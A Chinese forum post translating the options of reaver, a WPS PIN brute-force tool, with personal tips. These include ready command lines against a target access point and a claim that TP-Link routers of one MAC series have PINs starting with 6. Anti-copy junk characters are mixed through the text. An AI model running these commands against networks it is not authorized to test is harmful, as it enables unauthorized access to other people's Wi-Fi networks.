中尉
- 注册时间
- 2013-4-18
- 金币
- 378 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:27 天
连续签到:0 天
[LV.50]初入江湖
|
8 r4 V2 ?' ^9 i' A4 l
-i, --interface=<wlan> Name of the monitor-mode interface to use1 j7 y" p, {: I7 I2 z7 P
网卡的监视接口,通常是mon0
4 A) H) b$ E7 f -b, --bssid=<mac> BSSID of the target AP
3 D) i2 K- D- ]/ {- V$ B5 D$ Y AP的MAC地址3 J* M& O, p3 v# l2 s1 I
: k* ] B) D5 p
( a5 [. j: C5 b- Z: C% MOptional Arguments:, a6 p6 H& [: k! o* F! R7 x
-m, --mac=<mac> MAC of the host system- S& H- F6 b4 J0 K0 ^
指定本机MAC地址,在AP有MAC过滤的时候需要使用4 b) E7 z6 I/ s5 f" Q6 Q) e
-e, --essid=<ssid> ESSID of the target AP
- K# \1 W/ n W! K* i. ^. h 路由器的ESSID,一般不用指定
" k7 y5 f) G) D9 y -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
! A3 n& S/ I) j0 X4 G 信号的频道,如果不指定会自动扫描
$ f' i+ @$ n' p+ O -o, --out-file=<file> Send output to a log file [stdout]
% N7 Q9 e) N" x$ j: L 标准输出到文件
& `, A4 _: E. M2 x8 N3 Z' R -s, --session=<file> Restore a previous session file8 A/ q" B4 V2 U2 w) N, @; [
恢复进程文件0 t& S2 U L* c2 {
-C, --exec=<command> Execute the supplied command upon successful pin recovery
! _9 v; X! {2 `" {+ {" t+ g pin成功后执行命令
4 L5 J9 Y7 N5 R, x) \1 a t5 K -D, --daemonize Daemonize reaver
# L% J2 f& d# Y! M9 q 设置reaver成Daemon. \6 S% C; {1 P1 v+ S
-a, --auto Auto detect the best advanced options for the target AP
7 u' H# o% |7 P 对目标AP自动检测高级参数
6 \- L3 Q4 d2 P8 P V -f, --fixed Disable channel hopping7 ]2 k" }/ H1 o" H
禁止频道跳转
2 y8 F9 L# [9 Y$ o; F -5, --5ghz Use 5GHz 802.11 channels
4 Q' I2 [1 Q, w- Z1 t, s; p 使用5G频道
- h; j) F5 E& @( N: w6 P; x -v, --verbose Display non-critical warnings (-vv for more)
: x0 q- M& q3 ^$ ?4 l$ e3 b. _ 显示不重要警告信息 -vv 可以显示更多
3 Q, A0 r _$ | -q, --quiet Only display critical messages! v+ m3 G7 W c3 p+ H: p: U
只显示关键信息" b2 @8 u$ |( s" |
-h, --help Show help
: T7 x, k z4 x1 ` 显示帮助& K+ Y' [, Q8 M. e r* j8 x2 O; `
7 k3 M/ e% i! o! h9 t. R7 E) Q" @6 b+ H. f9 U, ^
Advanced Options:
9 ^8 S$ e/ U9 F t) j( n -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
3 G) n! C+ C. d1 `0 R+ r* ^ 直接读取psk(本人测试未成功,建议用网卡自带软件获取)
% G+ f0 d# v1 E -d, --delay=<seconds> Set the delay between pin attempts [1]- r4 h7 a+ y; h' ^7 a2 g
pin间延时,默认1秒,推荐设0& o+ b# n+ n& E( n
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]. ^1 W+ p( l" A- [
AP锁定WPS后等待时间1 {6 N/ k2 e) y
-g, --max-attempts=<num> Quit after num pin attempts
7 y, J n! E% _% B) u; y9 b: c 最大pin次数
4 i, k! [# M& e5 Y D -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
+ o" p# Q- E7 j+ p 10次意外失败后等待时间,默认0秒
3 {1 U1 y' Y" M+ t -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts$ L v% Q/ q. ^2 F4 P( k
每x次pin后等待y秒
& i& a1 A% C% S; d3 K/ p3 \/ ]3 X -t, --timeout=<seconds> Set the receive timeout period [5]/ U) \2 D# `( l6 ?/ k( J* S
收包超时,默认5秒. \4 E* M* O8 [& q3 ^3 V+ y
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]. C4 G( ~0 e' z# j
M5/M7超时,默认0.2秒
# m: G2 S* Q. o$ Z. K -A, --no-associate Do not associate with the AP (association must be done by another application)$ n" g4 {' F0 U: j9 M$ X# k
不连入AP(连入过程必须有其他程序完成)
2 W7 u4 {1 t" b& c8 { j. j. V8 \ -N, --no-nacks Do not send NACK messages when out of order packets are received
3 a1 I, n( O7 l5 T* \4 K. y0 j 不发送NACK信息(如果一直pin不动,可以尝试这个参数)
9 d J. S) T2 `) @ -S, --dh-small Use small DH keys to improve crack speed# a* }* t1 P& {$ M0 e' k9 }
使用小DH关键值提高速度(推荐使用)1 {' T" {7 u% V3 W4 S1 w: Z
-L, --ignore-locks Ignore locked state reported by the target AP
( N2 h8 n' b' B$ L$ H 忽略目标AP报告的锁定状态' B+ H4 X, A W4 ~
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet# b- [; R! h1 J* a* ^/ w
每当收到EAP失败包就终止WPS进程5 B$ U4 j' _" ~- z* K6 H4 Z$ b
-n, --nack Target AP always sends a NACK [Auto]
) f9 j+ K x. S9 A3 T" c 对目标AP总是发送NACK,默认自动2 l5 M) o, j9 U) [5 O7 s% R
-w, --win7 Mimic a Windows 7 registrar [False]
, b3 m: d/ N0 h. L0 n2 q 模拟win7注册,默认关闭
' x0 Q5 E$ n" L$ L; a
# R# B% r/ z9 P/ G: g+ y1 I d- W8 U------个人心得--------------------------------------------------------- c8 J, N7 w- K/ N* Z1 w
- V/ S# q# c; ]对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的
6 ?5 r' m( Y# [. u- Y3 qreaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
7 b" W4 K5 E, Q: L5 s! l: u0 e; e% g2 `2 j9 t
如果一直pin不动,尝试加-N参数5 L$ V8 X- E6 v# L
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -& [" G) c: |; R1 m: e
- \0 p% t: C* S* H# I# k6 c① PIN的是TP-Link是5C:63:BF:XX:XX:XX系列 pin的开头是6开通的 (测试多个确实如此不包含奇葩的)# l* R: x7 B: n7 f' k
|
|
[复制链接]
IP卡
狗仔卡
发表于 2013-3-16 17:16
显身卡
